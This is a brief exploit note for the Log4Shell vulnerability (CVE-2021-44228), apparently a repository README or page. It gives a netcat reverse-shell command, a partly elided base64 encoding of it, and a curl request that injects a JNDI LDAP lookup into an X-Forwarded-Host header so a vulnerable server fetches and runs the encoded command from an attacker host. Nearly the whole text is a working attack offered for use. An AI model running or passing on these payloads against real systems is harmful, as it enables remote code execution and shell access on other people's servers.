log4jshell_CVE-2021-44228

Log4jshell - CVE-2021-44228

Netcat

nc [Public IP] [Port] -e /bin/sh

Convert into Base64

bmMgMy4xMD.....wMyA4ODg4IC1lIC9iaW4vc2g=

Payload

curl [Target Website] -H "X-Forwarded-Host: ${jndi:ldap://[ReverseshellIP]:[Port]/Basic/Command/Base64/[Payload in base64]

Proof of concept

Log4j PoC

Follow